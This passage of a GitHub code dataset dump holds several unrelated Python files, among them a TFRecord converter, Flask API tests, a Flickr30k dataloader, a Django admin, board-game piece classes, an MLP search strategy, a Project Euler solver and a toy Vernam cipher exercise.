\"\"\"Converts a dataset to tfrecords.\"\"\"\n\n s_rows = hparams.in_source_width\n t_rows = hparams.in_template_width\n\n filename = os.path.join(hparams.data_dir, name + '.tfrecords')\n\n print('Writing', filename)\n writer = tf.python_io.TFRecordWriter(filename)\n\n if nccnet:\n model = models.create_model(hparams, data, train = False)\n sess = model.sess\n g = model\n\n else: #Simple NCC\n sess = tf.Session()\n model = models.Graph()\n\n model.image = tf.placeholder(tf.float32, shape=[hparams.in_source_width,hparams.in_source_width])\n model.template = tf.placeholder(tf.float32, shape=[hparams.in_template_width,hparams.in_template_width])\n\n search_dim = tf.expand_dims(tf.expand_dims(search, dim=0), dim=3)\n template_dim = tf.expand_dims(tf.expand_dims(template, dim=0), dim=3)\n\n model.source_alpha = [search_dim]\n model.template_alpha = [template_dim]\n model.similar = tf.constant(np.ones((8)))\n\n model = models.normxcorr(g, hparams)\n model = loss.loss(g, hparams)\n\n index = 0\n while(index < num_examples):\n\n if nccnet:\n t, s = data.getBatch(hparams)\n else:\n t, s = data.getSample([t_rows, t_rows], [s_rows, s_rows], hparams.resize, data.metadata)\n\n ct = hparams.in_template_width/2-hparams.template_width/2\n st = hparams.in_source_width/2-hparams.source_width/2\n\n t_cropped = t[:, int(ct):int(ct+hparams.template_width), int(ct):int(ct+hparams.template_width)]\n s_cropped = s[:, int(st):int(st+hparams.source_width), int(st):int(st+hparams.source_width)]\n\n results = sess.run(model.full_loss, feed_dict={model.template: t_cropped, model.image: s_cropped, model.similar: np.ones((8))})\n\n for i in range(8):\n result = results[i,0,0,0]\n print(result)\n if(result> -0.14) or result<-0.90:\n print('done', index)\n\n search_raw = np.asarray(s[i]*255, dtype=np.uint8).tostring()\n temp_raw = np.asarray(t[i]*255, dtype=np.uint8).tostring()\n\n ex = tf.train.Example(features=tf.train.Features(feature={\n 'search_raw': _bytes_feature(search_raw),\n 'template_raw': _bytes_feature(temp_raw),}))\n\n writer.write(ex.SerializeToString())\n index += 1\n writer.close()\n\n\ndef main(unused_argv):\n # Get the data.\n hparams = hyperparams.create_hparams()\n data = d.Data(hparams, prepare = True )\n\n # Convert to Examples and write the result to TFRecords.\n convert_to(data, hparams, 1000, 'hardest_examples')\n #convert_to(data, hparams, 1000, 'validation_1K')\n #convert_to(data, hparams, 1000, 'test_1K')\n\n\nif __name__ == '__main__':\n tf.app.run(main=main, argv=[sys.argv[0]])\n","repo_name":"seung-lab/FilterFinder","sub_path":"inference/prepare_harder_data.py","file_name":"prepare_harder_data.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"11647466773","text":"\"\"\"Unit tests for Combatant API.\"\"\"\n\nimport json\nimport pytest\n\n\ndef test_create_anonymous(app, combatant_data):\n \"\"\"Test create user as anonymous.\"\"\"\n client = app.test_client()\n response = client.post('/api/combatant', data=combatant_data)\n assert response.status_code == 401\n\n\ndef test_create_admin(app, admin_user, login_client, combatant_data):\n \"\"\"Test create and delete user vi API as admin.\"\"\"\n response = login_client.post(\n '/api/combatant',\n data=json.dumps(combatant_data),\n content_type = 'application/json'\n )\n\n assert response.status_code == 200\n uuid = response.json.get('uuid')\n assert uuid is not None\n\n response = login_client.delete('/api/combatant/{0}'.format(uuid))\n assert response.status_code == 200\n\n\ndef test_create_unprivileged(unprivileged_user, login_client, combatant_data):\n \"\"\"Test create user as with a valid but unprivileged user.\"\"\"\n response = login_client.post(\n '/api/combatant',\n data=json.dumps(combatant_data),\n content_type = 'application/json'\n )\n assert response.status_code == 401\n\n\n@pytest.mark.parametrize(\n 'privileged_user',\n [{None: ['edit_combatant_info']}],\n indirect=True\n)\ndef test_create_authorized(app, privileged_user, login_client, combatant_data, ):\n \"\"\"Test create user as with a valid and privileged user.\"\"\"\n response = login_client.post(\n '/api/combatant',\n data=json.dumps(combatant_data),\n content_type = 'application/json'\n )\n assert response.status_code == 200\n uuid = response.json.get('uuid')\n assert uuid is not None\n\n response = login_client.delete('/api/combatant/{0}'.format(uuid))\n assert response.status_code == 200\n\n","repo_name":"lrt512/eMoL_flask","sub_path":"emol/emol/api/tests/test_combatant_api.py","file_name":"test_combatant_api.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9679578321","text":"import torch\nfrom torch.utils.data import Dataset , DataLoader\nimport os\nfrom PIL import Image\nimport json\nfrom param import args\nimport numpy as np\nfrom transformers import AutoTokenizer\nfrom transformers import AutoFeatureExtractor\n\n\nclass FlickrDataset(Dataset):\n \"\"\"\n 对Flickr30k中读取到的数据进行预处理并打包为Dataset类型\n \"\"\"\n def __init__(self , root , json_path , split):\n self.root = root\n self.dataset = json.load(open(json_path , 'r'))['images']\n self.ids = []\n for idx , dataItem in enumerate(self.dataset):\n if dataItem['split'] == split:\n self.ids += [(idx , capIdx) for capIdx in range(len(dataItem['sentences']))] # 一张图片形成5个图文对\n # [(i , x0) , (i , x1) , (i , x2) , (i , x3) , (i , x4)]\n \n def __getitem__(self , index):\n \"\"\"\n 根据索引,从dataset中抽取对应元素的张量数据,为collate_fn服务\n \"\"\"\n pair_id = self.ids[index]\n img_id = pair_id[0]\n caption = self.dataset[img_id]['sentences'][pair_id[1]]['raw']\n\n img_path = self.dataset[img_id]['filename']\n image = Image.open(os.path.join(self.root , img_path)).convert('RGB')\n\n return image , caption , index\n \n def __len__(self):\n return len(self.ids)\n \ndef collate_fn(data):\n \"\"\"\n 为DataLoader服务,将从Dataset中抓取的数据进行打包\n \"\"\"\n images , captions , ids = zip(*data)\n \n # 处理图像\n image_processor = AutoFeatureExtractor.from_pretrained(\"facebook/vit-msn-small\")\n images = image_processor(images , return_tensors=\"pt\")\n images = images['pixel_values']\n # 处理文本\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\n lengths = [len(cap.split()) for cap in captions]\n captions = tokenizer(\n captions,\n padding=True,\n truncation=True,\n return_tensors=\"pt\",\n max_length=max(lengths)\n )\n \n return images , captions , lengths , list(ids)\n\ndef FlickrDataLoader(split , root , json_path , batch_size , shuffle , num_workers , collate_fn=collate_fn):\n \"\"\"\n 获取DataLoader\n \"\"\"\n dataset = FlickrDataset(root , json_path , split)\n data_loader = DataLoader(\n dataset = dataset,\n batch_size = batch_size,\n shuffle = shuffle, \n num_workers = num_workers, \n collate_fn = collate_fn\n )\n return data_loader \n\n\ndef get_path(path='../data/'):\n imgdir = os.path.join(path , 'flickr30k-images')\n cap_path = os.path.join(path , 'dataset.json')\n\n return imgdir , cap_path\n\n\ndef get_train_dev_loader(batch_size , workers):\n imgdir , capdir = get_path()\n\n train_loader = FlickrDataLoader(\n split = 'train',\n root = imgdir,\n json_path = capdir,\n batch_size = batch_size,\n shuffle = True,\n num_workers = workers,\n collate_fn = collate_fn\n )\n \n val_loader = FlickrDataLoader(\n split = 'val',\n root = imgdir,\n json_path = capdir,\n batch_size = batch_size,\n shuffle = False,\n num_workers = workers,\n collate_fn = collate_fn\n )\n\n return train_loader , val_loader\n\n\ndef get_test_loader(batch_size , workers):\n imgdir , capdir = get_path()\n\n test_loader = FlickrDataLoader(\n split = 'test',\n root = imgdir,\n json_path = capdir,\n batch_size = batch_size,\n shuffle = False,\n num_workers = workers,\n collate_fn = collate_fn\n )\n\n return test_loader\n\nif __name__ == \"__main__\":\n train_loader , val_loader = get_train_dev_loader(\n args.batch_size,\n args.workers\n )\n for idx , train_data in enumerate(train_loader):\n images , captions , lengths , _ = train_data\n if idx in [0,1,2,3]:\n print(images , images.shape) # tensor (batch_size , 3 , 224 , 224)\n print(captions) # dict: {input_ids: ... , attention_mask: ...}\n print(lengths) # list (batch_size)\n else:\n break\n\n\n\n","repo_name":"xiningin/VSEpp-Text-Image-Retrieve","sub_path":"train/transformer_data_process.py","file_name":"transformer_data_process.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"7105490540","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom . import models\nfrom rooms import models as room_models\n\n\nclass RoomInline(admin.TabularInline):\n model = room_models.Room\n\n\n# Register your models here.\n@admin.register(\n models.User\n) # models.py에서 User 을 가져오는거지. 그래서 CustomUserAdmin class에서 사용하는거여\nclass CustomUserAdmin(UserAdmin): # UserAdmin이 있는 이유는 그냥 장고에서 만들어준 UserAdmin을 상속받은거임.\n\n \"\"\" Custom User Admin\"\"\"\n\n inlines = (RoomInline,)\n # UserAdmin.fieldsets 한 이유는 이게 없으면 Custom Profile 부분만 나오기 때문이다.\n fieldsets = UserAdmin.fieldsets + (\n (\n \"Custom Profile\",\n {\n \"fields\": (\n \"avatar\",\n \"gender\",\n \"bio\",\n \"birthdate\",\n \"language\",\n \"currency\",\n \"superhost\",\n \"login_method\",\n )\n },\n ),\n )\n\n list_filter = UserAdmin.list_filter + (\"superhost\",)\n\n list_display = (\n \"username\",\n \"first_name\",\n \"last_name\",\n \"email\",\n \"is_active\",\n \"language\",\n \"currency\",\n \"superhost\",\n \"is_staff\",\n \"is_superuser\",\n \"email_verified\",\n \"email_secret\",\n \"login_method\",\n )\n\n # list.display , list.filter 함수를 사용하면\n","repo_name":"seongryeol-han/airbnb-clone","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"69883242660","text":"import board\n\nclass GamePiece:\n \"\"\"\n Parent Class to set standard attributes for Game pieces\n \"\"\"\n\n def __init__(self, player_piece_color):\n \"\"\"\n Parent class to intialize Game piece colors, their type, and a dictionary with alist of diagonal moves\n \"\"\"\n self._color = player_piece_color\n self._piece_type = self.__class__.__name__\n \n def __str__(self):\n \"\"\"\n Dunder method to allow for class string representation for testing purposes\n \"\"\"\n return self.__class__.__name__ + self.get_color()\n\n def get_color(self):\n \"\"\"\n Returns player piece by its color\n \"\"\"\n return self._color\n\n def get_piece_name(self):\n \"\"\"\n returns private piece_type variable\n \"\"\"\n return self._piece_type\n\n def get_diagonal_moves(self, position):\n \"\"\"\n \n \"\"\"\n return self._diagonal_generator(position)\n\n def _diagonal_generator(self, position):\n \"\"\"[summary]\n\n Args:\n position (tuple): [description]\n\n Returns:\n list: array of tuples with x,y matrix coordinates\n \"\"\"\n x,y = position\n deltas = (-1, 1)\n x_positions = [x + i for i in deltas if -1 < x + i < 9]\n y_positions = [y + i for i in deltas if -1 < y + i < 10]\n\n #print(list(x_positions))\n #print(list(y_positions))\n\n for x_pos in x_positions:\n for y_pos in y_positions:\n yield x_pos, y_pos\n\nclass General(GamePiece):\n \"\"\"\n Represents General game piece, inherits from Game Piece class\n \"\"\"\n pass\n\n def __init__(self, _color):\n \"\"\"\n initalizes color from Parent class and list of possible move coordinates\n \"\"\"\n super().__init__(_color)\n self._moves = [(-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 0), (0, 1), \n (1, 1), (1, 0), (1, -1), ]\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_board):\n \"\"\"\n checks that General piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n if (x_to, y_to) in board.Board().get_palace(self.get_color()):\n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves\n else:\n False\n \nclass Guard(GamePiece):\n \"\"\"\n Represents Guard game piece, inherits from Game Piece class\n \"\"\"\n\n def __init__(self, _color):\n \"\"\"\n\n \"\"\"\n super().__init__(_color)\n self._moves = [(-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 0), (0, 1), \n (1, 1), (1, 0), (1, -1)]\n\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_board):\n \"\"\"\n checks that Guard piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n if (x_to, y_to) in board.Board().get_palace(self.get_color()):\n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves\n else:\n return False\n\n \nclass Horse(GamePiece):\n \"\"\"\n Represents Horse game piece, inherits from Game Piece class\n \"\"\"\n\n def __init__(self, _color):\n \"\"\"\n\n \"\"\"\n super().__init__(_color)\n self._moves = [(-1, -2), (-1, 2), (-2, -1),\n (-2, 1), (0, 0), (1, -2), \n (1, 2), (2, -1), (2, 1)]\n \n def is_legal_move(self, x_from, y_from, x_to, y_to, game_board):\n \"\"\"\n checks that Horse piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n\n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves\n\nclass Elephant(GamePiece):\n \"\"\"\n Represents Elephant game piece, inherits from Game Piece class\n \"\"\"\n\n def __init__(self, _player_piece_color):\n \"\"\"\n\n \"\"\"\n super().__init__(_player_piece_color)\n self._moves = [(-3, -2), (-3, 2), (-2, -3),\n (-2, 3), (0, 0), (2, -3), \n (2, 3), (3, -2), (3, 2)]\n\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_game_board):\n \"\"\"\n checks that Horse piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n \n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves\n\nclass Chariot(GamePiece):\n \"\"\"\n Represents Chariot game piece, inherits from GamePiece class\n \"\"\"\n def __init__(self, _color):\n \"\"\"\n\n \"\"\"\n super().__init__(_color)\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_game_game_board):\n \"\"\"\n checks that Chariot piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n x_step = 1 if x_from < x_to else -1\n y_step = 1 if y_from < y_to else -1\n\n if not (x_from == x_to or y_from == y_to):\n return False\n\n if x_from == x_to:\n col = x_from\n for row in range(y_from + y_step, y_to, y_step):\n if game_game_game_board[col][row] != \"\":\n return False\n\n if y_from == y_to:\n row = y_from\n for col in range(x_from + x_step, x_to, x_step):\n if game_game_game_board[col][row] != \"\":\n return False\n return True\n \n\nclass Cannon(GamePiece):\n \"\"\"\n Represents Cannon game piece, inherits from GamePiece class\n \"\"\"\n def __init__(self, _player_piece_color):\n \"\"\"\n\n \"\"\"\n super().__init__(_player_piece_color)\n\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_board):\n \"\"\"\n checks that Cannon piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n x_step = 1 if x_from < x_to else -1\n y_step = 1 if y_from < y_to else -1\n\n if not (x_from == x_to or y_from == y_to):\n return False\n\n try:\n if game_board[x_to][y_to].get_piece_name() == \"Cannon\":\n return False\n except AttributeError:\n pass\n \n piece_count = 0\n if x_from == x_to:\n col = x_from\n for row in range(y_from + y_step, y_to, y_step):\n if game_board[col][row] != \"\":\n piece_count += 1\n if piece_count > 1:\n return False\n if game_board[col][row].get_piece_name() == \"Cannon\":\n return False\n\n if y_from == y_to:\n row = y_from\n for col in range(x_from + x_step, x_to, x_step):\n if game_board[col][row] != \"\":\n piece_count += 1\n if piece_count > 1:\n return False\n if game_board[col][row].get_piece_name() == \"Cannon\":\n return False\n if piece_count == 0:\n return False\n return True\n\nclass Soldier(GamePiece):\n \"\"\"\n Represents Soldier game piece, inherits from GamePiece class\n \"\"\"\n\n def __init__(self, _player_piece_color):\n \"\"\"\n\n \"\"\"\n super().__init__(_player_piece_color)\n if self.get_color() == \"BLUE\":\n self._moves = [(-1, 0), (0, -1), (0, 0), (0, 1)] # for Blue\n\n elif self.get_color() == \"RED\":\n self._moves = [(1, 0), (0, -1), (0, 0), (0, 1)] # for Red\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_board):\n \"\"\"\n checks that Soldier piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves","repo_name":"branhoff/python_class_102","sub_path":"IDE_exercises/solutions/project-09/GamePiece.py","file_name":"GamePiece.py","file_ext":"py","file_size_in_byte":7774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"2415946168","text":"\"\"\"\nFile containing MLPChromosome class:\n MLPChromosome represents the architecture of an MLP network, including fully connected layer\n and parameter genes\n\"\"\"\nfrom __future__ import annotations\nimport itertools\nfrom typing import Union, List\n\nimport tensorflow as tf\n\nfrom revolve.grids import MLPParameterGrid\nfrom revolve.architectures.genes import FCGene, ParameterGene\nfrom revolve.architectures.chromosomes import MLPChromosome\nfrom revolve.architectures.base import BaseStrategy\n\n\nclass MLPStrategy(BaseStrategy):\n \"\"\"\n Strategy class for handling MLP chromosomes. This strategy is responsible for\n generating a population of MLPChromosomes, and checking if a chromosome is a valid architecture.\n\n Args:\n parameters (dataclass): Dataclass containing learnable parameters.\n max_fc (int, optional): Maximum number of fully connected layers. Defaults to 3.\n epochs (int, optional): Number of epochs for training. Defaults to 100.\n callback (tf.keras.callbacks.Callback, optional): Keras Callback object. Defaults to None.\n loss (Union[tf.keras.losses.Loss, str], optional): Loss function.\n Defaults to tf.keras.losses.MeanSquaredError().\n metric (Union[tf.keras.metrics.Metric, str], optional): Metric for evaluation.\n Defaults to tf.keras.metrics.MeanAbsoluteError().\n\n \"\"\"\n\n def __init__( # pylint: disable=too-many-arguments\n self,\n parameters: type[MLPParameterGrid],\n max_fc: int = 3,\n squeeze_fc: bool = False,\n epochs: int = 100,\n callback: tf.keras.callbacks.Callback = None,\n loss: Union[tf.keras.losses.Loss, str] = tf.keras.losses.MeanSquaredError(),\n metric: Union[\n tf.keras.metrics.Metric, str\n ] = tf.keras.metrics.MeanAbsoluteError(),\n ):\n self.max_fc = max_fc\n self.squeeze_fc = squeeze_fc\n self.epochs = epochs\n self.callback = callback\n\n if isinstance(loss, str):\n self.loss = tf.keras.losses.get(loss)\n else:\n self.loss = loss\n\n if isinstance(metric, str):\n self.metric = tf.keras.metrics.get(metric)\n else:\n self.metric = metric\n\n self.parameters = parameters # self.get_learnable_parameters()\n\n @staticmethod\n def create_new_chromosome(genes: List[Union[FCGene, ParameterGene]]):\n \"\"\"\n Create a new MLPChromosome from a list of genes.\n\n Args:\n genes (List[Union[FCGene, ParameterGene]]): List of genes to be used for\n creating the chromosome.\n\n Returns:\n MLPChromosome: A new MLPChromosome.\n \"\"\"\n return MLPChromosome(genes=genes)\n\n def generate_population(self, population_size: int) -> List:\n \"\"\"\n Generate a population of chromosomes with unique architectures.\n\n Parameters:\n population_size (int): The size of the population to generate.\n\n Returns:\n List: The generated population of chromosomes.\n \"\"\"\n assert isinstance(population_size, int)\n\n population: List[MLPChromosome] = []\n\n key_store: List[str] = []\n\n while len(population) < population_size:\n fc_block = self.fc_block(self.parameters, FCGene, max_fc=self.max_fc)\n\n if self.squeeze_fc:\n fc_block = self.squeeze_fc_neurons(fc_block)\n\n parameter_block = self.parameter_block(self.parameters, gene=ParameterGene)\n\n genes = list(itertools.chain(fc_block, parameter_block))\n\n chromosome = self.create_new_chromosome(genes)\n\n key = chromosome.get_unique_key(chromosome.genes)\n\n if key not in key_store:\n if self.check_valid_architecture(\n chromosome, \"hidden_neurons\"\n ) and self.check_first_layer(chromosome, \"hidden_neurons\"):\n population.append(chromosome)\n key_store.append(key)\n\n return population\n","repo_name":"ThePopeLabs/REvolve","sub_path":"revolve/architectures/strategies/mlp_strategy.py","file_name":"mlp_strategy.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"1281992814","text":"import sys\n\n\"\"\"\nSolve p = a^2 + b^2 where p is a prime and p = 1 (mod 4)\n\"\"\"\nclass HermiteSerretAlgorithm():\n def get(self, prime):\n if prime % 4 != 1:\n raise ValueError\n x = self.__find_x(prime)\n return self.__apply_brillhart_method(prime, x)\n\n def __find_x(self, prime):\n half_prime = (prime - 1) // 2\n for a in range(1, half_prime + 1):\n if pow(a, half_prime, prime) == prime - 1:\n return pow(a, (prime - 1) // 4, prime)\n raise ValueError\n\n def __apply_brillhart_method(self, prime, x):\n if prime % x == 1:\n return (1, x)\n a, b = prime, x\n while b != 0:\n r = a % b\n if r * r < prime:\n return (b % r, r)\n a, b = b, r\n raise ValueError\n\n\"\"\"\n(a^2 + b^2)(c^2 + d^2) = (ac + bd)^2 + (ad - bc)^2 = (ac - bd)^2 + (ad + bc)^2\n\"\"\"\nclass BrahmaguptaFibonacciIdentity():\n def get_one_list_and_another_list(self, one_list, another_list):\n result = set()\n for one in one_list:\n for another in another_list:\n result |= self.get_one_and_another(one, another)\n return result\n\n def get_one_and_another_list(self, one, another_list):\n result = set()\n for another in another_list:\n result |= self.get_one_and_another(one, another)\n return result\n\n def get_one_list_and_another(self, one_list, another):\n result = set()\n for one in one_list:\n result |= self.get_one_and_another(one, another)\n return result\n\n def get_one_and_another(self, one, another):\n result = set()\n a, b = one\n c, d = another\n x, y = abs(a * c - b * d), a * d + b * c\n if x > y:\n result.add((y, x))\n else:\n result.add((x, y))\n x, y = a * c + b * d, abs(a * d - b * c)\n if x > y:\n result.add((y, x))\n else:\n result.add((x, y))\n return result\n\nclass FactorizationAlgorithm():\n def __init__(self, n):\n self.values = self.__get_values(n)\n\n def __get_values(self, n):\n values = [{} for i in range(n + 1)]\n for i in range(2, n + 1):\n if values[i]:\n continue\n for j in range(i, n + 1, i):\n values[j][i] = 1\n d = i * i\n while d <= n:\n for j in range(d, n + 1, d):\n values[j][i] += 1\n d *= i\n return values\n\n \"\"\"\n Get the factorization of a * b.\n \"\"\"\n def get(self, a, b):\n result = {}\n for p in self.values[a]:\n result[p] = self.values[a][p]\n for q in self.values[b]:\n if q not in result:\n result[q] = 0\n result[q] += self.values[b][q]\n return result\n\n\"\"\"\nSolve n = a^2 + b^2.\n\"\"\"\nclass SumsOfTwoSquaresAlgorithm():\n def __init__(self):\n self.one_sum_pair = (0, 1)\n self.two_sum_pair = (1, 1)\n self.hermite_serret_algorithm = HermiteSerretAlgorithm()\n self.brahmagupta_fibonacci_identity = BrahmaguptaFibonacciIdentity()\n self.solution_cache = {}\n\n def get(self, factorization):\n result = set()\n if not self.__has_solution(factorization):\n return result\n \n result.add(self.one_sum_pair)\n scalar = 1\n for p in factorization:\n e = factorization[p]\n if p == 2:\n if e % 2 == 1:\n result = self.brahmagupta_fibonacci_identity.get_one_list_and_another(result, self.two_sum_pair)\n scalar *= p**(e // 2)\n elif p % 4 == 3:\n scalar *= p**(e // 2)\n else:\n prime_factor_solution = self.__get_prime_factor_solution(p, e)\n result = self.brahmagupta_fibonacci_identity.get_one_list_and_another_list(result, prime_factor_solution)\n return self.__multiply_scalar(result, scalar)\n\n def __has_solution(self, factorization):\n for p in factorization:\n e = factorization[p]\n if p % 4 == 3 and e % 2 == 1:\n return False\n return True\n\n def __get_prime_factor_solution(self, p, e):\n n = pow(p, e)\n if n not in self.solution_cache:\n result = set()\n primitive_pair = self.hermite_serret_algorithm.get(p)\n result.add(primitive_pair)\n for i in range(2, e + 1):\n result = self.brahmagupta_fibonacci_identity.get_one_list_and_another(result, primitive_pair)\n self.solution_cache[n] = result\n return self.solution_cache[n]\n\n def __multiply_scalar(self, solution, scalar):\n result = set()\n for x, y in solution:\n result.add((x * scalar, y * scalar))\n return result\n\nclass Problem():\n def solve(self):\n print(self.get(10**10))\n\n def get(self, n):\n a, t = self.__decompose(n)\n factorization_algorithm = FactorizationAlgorithm(2 * t)\n sums_of_two_squares_algorithm = SumsOfTwoSquaresAlgorithm()\n\n total_distance = 0\n # Case 1: x = 0\n factorization = factorization_algorithm.get(t + 0, t - 0)\n solution = sums_of_two_squares_algorithm.get(factorization)\n for y, z in solution:\n symmetric_count = self.__get_symmetric_count(y, z)\n manhattan_distance = y + z\n total_distance += manhattan_distance * symmetric_count\n\n # Case 2: x = 1 to t - 1\n for x in range(1, t):\n factorization = factorization_algorithm.get(t + x, t - x)\n solution = sums_of_two_squares_algorithm.get(factorization)\n for y, z in solution:\n symmetric_count = 2 * self.__get_symmetric_count(y, z) # +x and -x\n manhattan_distance = x + y + z\n total_distance += manhattan_distance * symmetric_count\n\n # Case 3: x = t. Then y = 0, z = 0, symmetric_count = 2 (+t and -t)\n total_distance += t * 2\n\n return total_distance * 2**a\n\n \"\"\"\n Write n = 2^a t where t is odd\n \"\"\"\n def __decompose(self, n):\n a = 0\n d = n\n while d % 2 == 0:\n a += 1\n d //= 2\n return a, d\n\n def __get_symmetric_count(self, a, b):\n count = 1\n if a != 0:\n count *= 2\n if b != 0:\n count *= 2\n if a != b:\n count *= 2\n return count\n\ndef main():\n problem = Problem()\n problem.solve()\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"torehc/ProjectEuler","sub_path":"360.py","file_name":"360.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"35730073748","text":"#Реализовать программу симметричного шифрования вводимой строки,\n#используя гаммирование по алгоритму Вернона (ключ — случайная двоичная последовательность).\n\nimport random\ns = str(input())\nletters = \"абвгдежзийклмнопрстуфхцчшщъыьэюя\"\nkey = random.randint(0, 63)\nword = \"\"\n\nfor i in s:\n let = bin(letters.index(i)^key)[2:]\n while len(let) < 6:\n let = \"0\" + let\n word += let\n\nprint(\"Ключ - \", key)\nprint(word)\n","repo_name":"Exiti228/infobez","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34514626844","text":"import click\nimport sys\n\n\ndef is_positive_integer(n):\n \"\"\"Returns True if n is a positive integer\"\"\"\n\n\n return False\n\n\ndef process(n):\n \"\"\"Returns the string representation of integer n unless:\n - n is evenly divisible by 3 (returns 'Fizz')\n - n is evenly divisible by 5 (returns 'Buzz')\n - n is evenly divisible by both 3 and 5 (returns 'FizzBuzz')\"\"\"\n\n return ''\n\n\n@click.command()\n@click.option('-n', default=100, help='A positive integer')\ndef main(n):\n\n # Validate input\n if not is_positive_integer(n):\n print(\"the value of n must be a positive, non-zero integer\")\n sys.exit()\n\n # Iterate from 1 to n inclusive and print FizzBuzz\n for i in range(1, n+1):\n print(process(i))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cherdt/fizzbuzz","sub_path":"fizzbuzz/fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40377358104","text":"from prettytable import PrettyTable\nfrom Logic.Logic_ExperienciaResidenciaLogic import ExperienciaResidenciaLogic\nfrom Logic.Logic_ExperienciasLogic import ExperienciaLogic\nfrom Logic.Logic_TematicaLogic import TematicaLogic\nfrom Views.View_Tematica import TematicaBE\n\nclass organizarExperienciaBE:\n def __init__(self):\n self.dbexperiencia = ExperienciaLogic()\n self.dbexperienciaresidencia = ExperienciaResidenciaLogic()\n self.dbtematica =TematicaLogic()\n self.betematica = TematicaBE()\n \n #INGRESO DE DATOS\n def addOrganizarExperiencia(self):\n self.addExperiencia()\n\n def addExperiencia(self):\n print(\"\\nAdding a new experiencia...\")\n host = input(\"\\nNombre del anfitrion: \")\n ExperienceTitle = input(\"\\nTítulo experiencia: \")\n TypeExperience =int(input(\"\\nTipo de experiencia (0-Online||1-Presencial): \"))\n\n if TypeExperience==0:\n TypeExperience= 0\n Location=input(\"\\nPlataforma (Meets|Zoom|Teams|Otro): \")\n description = input(\"Descripción de la experiencia: \")\n Idiom=input(\"\\nIdioma : \")\n PublicObject = input(\"Publico objetivo: \")\n Organization = input(\"Organizacion: \")\n hostExperience = input(\"Experiencia del anfitrion(Basico|Medio|Experto): \")\n NeedElements = input(\"Elementos faltantes: \")\n PrecioIndividual = round(float(input(\"Precio Individual($0.00): \")),2)\n strFecha = input(\"\\nFecha (yyyy-mm-dd): \")\n strHora = input(\"\\nHora (hh:mm:ss): \")\n self.ordenarTematica()\n\n idTematic = int(input(\"¿La tematica se encuentra en las opciones?(1-Sí||0-No): \"))\n if idTematic==1:\n idTematic=input(\"Ingrese el id de la tematica: \")\n\n elif idTematic==0:\n idTematic = self.betematica.addTematicaProceso()\n\n strFechaCompleta = strFecha+\" \"+strHora\n\n elif TypeExperience==1:\n TypeExperience = 1\n Location=input(\"Ubicación: \")\n Idiom=input(\"Idioma : \")\n description = input(\"Descripción de la experiencia: \")\n PublicObject = input(\"Publico objetivo: \")\n Organization = input(\"Organizacion: \")\n hostExperience = input(\"Experiencia del anfitrion(Basico|Medio|Experto): \")\n NeedElements = input(\"Elementos faltantes: \")\n PrecioIndividual = round(float(input(\"Precio Individual($0.00): \")),2)\n strFecha = input(\"Fecha (yyyy-mm-dd): \")\n strHora = input(\"Hora (hh:mm:ss): \")\n self.ordenarTematica()\n idTematic = int(input(\"¿La tematica se encuentra en las opciones?(1-Sí||0-No): \"))\n if idTematic==1:\n idTematic=input(\"Ingrese el id de la tematica: \")\n\n elif idTematic==0:\n idTematic = self.betematica.addTematicaProceso()\n\n strFechaCompleta = strFecha+\" \"+strHora\n\n else:\n TypeExperience= 0\n Location=input(\"Plataforma (1.Meets|2.Zoom|3.Teams|4.Otro): \")\n Idiom=input(\"Idioma : \")\n description = input(\"Descripción de la experiencia: \")\n PublicObject = input(\"Publico objetivo: \")\n Organization = input(\"Organizacion: \")\n hostExperience = input(\"Experiencia del anfitrion(Basico|Medio|Experto): \")\n NeedElements = input(\"Elementos faltantes: \")\n PrecioIndividual = round(float(input(\"Precio Individual($0.00): \")),2)\n strFecha = input(\"Fecha (yyyy-mm-dd): \")\n strHora = input(\"Hora (hh:mm:ss): \")\n self.ordenarTematica()\n idTematic = int(input(\"¿La tematica se encuentra en las opciones?(1-Sí||0-No): \"))\n if idTematic==1:\n 